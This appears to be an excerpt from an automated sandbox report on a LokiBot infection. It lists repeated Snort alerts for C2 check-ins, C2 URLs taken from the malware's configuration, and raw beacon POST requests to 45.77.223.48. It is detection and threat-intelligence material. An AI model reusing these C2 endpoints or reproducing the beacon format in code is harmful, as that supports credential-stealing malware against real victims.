Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49796 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49796 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49799 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49799 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49801 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49801 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49801 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49801 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49802 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49802 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49802 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49802 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49803 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49803 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49803 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49803 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49805 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49805 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49806 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49806 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49806 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49806 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49807 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49807 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49807 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49807 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49808 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49808 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49808 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49808 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49809 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49809 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49809 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49809 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49810 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49810 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49810 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49811 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49811 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49811 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49813 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49813 -> 45.77.223.48:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://45.77.223.48/~blog/?ajax=posts.php

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
